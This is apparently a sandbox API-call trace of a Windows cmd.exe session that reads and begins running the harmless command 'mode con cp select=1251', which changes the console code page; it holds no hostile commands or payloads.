	[0032.259] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
	[0032.259] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13f5e8, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f5e8*=0x2, lpOverlapped=0x0) returned 1
	[0032.259] _vsnwprintf (in: _Buffer=0x4a536340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x13f618 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation.  All rights reserved.") returned 63
	[0032.259] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.259] GetFileType (hFile=0xf8) returned 0x3
	[0032.259] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.259] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation.  All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation.  All rights reserved.", lpUsedDefaultChar=0x0) returned 64
	[0032.259] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x13f5e8, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f5e8*=0x3f, lpOverlapped=0x0) returned 1
	[0032.259] _vsnwprintf (in: _Buffer=0x4a536340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x13f618 | out: _Buffer="\r\n") returned 2
	[0032.259] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.259] GetFileType (hFile=0xf8) returned 0x3
	[0032.259] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.259] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
	[0032.259] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13f5e8, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f5e8*=0x2, lpOverlapped=0x0) returned 1
	[0032.260] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0032.260] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0
	[0032.260] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290
	[0032.260] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0
	[0032.260] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.260] GetFileType (hFile=0xec) returned 0x3
	[0032.260] _setmode (_FileHandle=0, _Mode=32768) returned 16384
	[0032.260] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x13f440 | out: TokenHandle=0x13f440*=0x0) returned 0xc000007c
	[0032.260] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x13f440 | out: TokenHandle=0x13f440*=0x50) returned 0x0
	[0032.260] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x13f450, TokenInformationLength=0x4, ReturnLength=0x13f458 | out: TokenInformation=0x13f450, ReturnLength=0x13f458) returned 0x0
	[0032.260] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x13f458, TokenInformationLength=0x4, ReturnLength=0x13f450 | out: TokenInformation=0x13f458, ReturnLength=0x13f450) returned 0x0
	[0032.260] NtClose (Handle=0x50) returned 0x0
	[0032.260] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x13f420, nSize=0x0, Arguments=0x13f428 | out: lpBuffer="韠0") returned 0xf
	[0032.260] GetProcessHeap () returned 0x2f0000
	[0032.261] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x2f1ab0
	[0032.261] GetConsoleTitleW (in: lpConsoleTitle=0x13f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0032.261] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0
	[0032.261] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1
	[0032.262] GetProcessHeap () returned 0x2f0000
	[0032.262] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1ab0 | out: hHeap=0x2f0000) returned 1
	[0032.262] LocalFree (hMem=0x3097e0) returned 0x0
	[0032.262] GetProcessHeap () returned 0x2f0000
	[0032.262] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30aa10 | out: hHeap=0x2f0000) returned 1
	[0032.262] _vsnwprintf (in: _Buffer=0x4a536340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x13f158 | out: _Buffer="\r\n") returned 2
	[0032.262] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.262] GetFileType (hFile=0xf8) returned 0x3
	[0032.262] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
	[0032.262] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13f128, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f128*=0x2, lpOverlapped=0x0) returned 1
	[0032.262] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4
	[0032.262] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a52c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0032.262] _vsnwprintf (in: _Buffer=0x4a51eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x13f168 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37
	[0032.263] _vsnwprintf (in: _Buffer=0x4a51ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x13f168 | out: _Buffer=">") returned 1
	[0032.263] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.263] GetFileType (hFile=0xf8) returned 0x3
	[0032.263] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.263] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39
	[0032.263] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x13f158, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f158*=0x26, lpOverlapped=0x0) returned 1
	[0032.263] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.263] GetFileType (hFile=0xec) returned 0x3
	[0032.263] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.263] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.263] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.263] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e320, cchWideChar=1 | out: lpWideCharStr="m") returned 1
	[0032.264] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.264] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.264] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.264] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e322, cchWideChar=1 | out: lpWideCharStr="o") returned 1
	[0032.264] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.264] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.264] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.264] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e324, cchWideChar=1 | out: lpWideCharStr="d") returned 1
	[0032.264] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.264] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.264] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.264] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e326, cchWideChar=1 | out: lpWideCharStr="e") returned 1
	[0032.264] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.264] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.264] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.264] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0032.264] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.264] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.264] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.264] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1
	[0032.264] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.265] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.265] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.265] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1
	[0032.265] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.265] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.265] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.265] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1
	[0032.265] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.265] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.265] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.265] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0032.265] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.265] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.265] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.265] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e332, cchWideChar=1 | out: lpWideCharStr="c") returned 1
	[0032.265] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.265] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.265] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.265] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e334, cchWideChar=1 | out: lpWideCharStr="p") returned 1
	[0032.265] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.265] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.265] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.265] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0032.265] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.265] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.265] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.265] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e338, cchWideChar=1 | out: lpWideCharStr="s") returned 1
	[0032.266] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.266] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.266] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1
	[0032.266] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.266] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.266] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1
	[0032.266] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.266] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.266] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1
	[0032.266] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.266] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.266] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e340, cchWideChar=1 | out: lpWideCharStr="c") returned 1
	[0032.266] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.266] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.266] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e342, cchWideChar=1 | out: lpWideCharStr="t") returned 1
	[0032.266] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.266] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.266] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e344, cchWideChar=1 | out: lpWideCharStr="=") returned 1
	[0032.266] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.266] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.266] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e346, cchWideChar=1 | out: lpWideCharStr="1") returned 1
	[0032.267] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.267] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.267] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.267] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e348, cchWideChar=1 | out: lpWideCharStr="2") returned 1
	[0032.267] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.267] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.267] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.267] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1
	[0032.267] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.267] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.267] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.267] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1
	[0032.267] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.267] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.267] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.267] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
	[0032.280] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.280] GetFileType (hFile=0xec) returned 0x3
	[0032.280] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.280] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.280] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.280] GetFileType (hFile=0xf8) returned 0x3
	[0032.280] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.280] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25
	[0032.280] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x13f438, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f438*=0x18, lpOverlapped=0x0) returned 1
	[0032.280] GetProcessHeap () returned 0x2f0000
	[0032.280] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30cd20
	[0032.280] GetProcessHeap () returned 0x2f0000
	[0032.280] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cd20 | out: hHeap=0x2f0000) returned 1
	[0032.281] _wcsicmp (_String1="mode", _String2=")") returned 68
	[0032.281] _wcsicmp (_String1="FOR", _String2="mode") returned -7
	[0032.281] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7
	[0032.281] _wcsicmp (_String1="IF", _String2="mode") returned -4
	[0032.281] _wcsicmp (_String1="IF/?", _String2="mode") returned -4
	[0032.281] _wcsicmp (_String1="REM", _String2="mode") returned 5
	[0032.281] _wcsicmp (_String1="REM/?", _String2="mode") returned 5
	[0032.281] GetProcessHeap () returned 0x2f0000
	[0032.281] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x3097e0
	[0032.281] GetProcessHeap () returned 0x2f0000
	[0032.281] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1a) returned 0x304610
	[0032.281] GetProcessHeap () returned 0x2f0000
	[0032.281] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x38) returned 0x306510
	[0032.282] GetConsoleOutputCP () returned 0x1b5
	[0032.284] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a52bfe0 | out: lpCPInfo=0x4a52bfe0) returned 1
	[0032.284] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0032.284] GetConsoleTitleW (in: lpConsoleTitle=0x13f3f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a
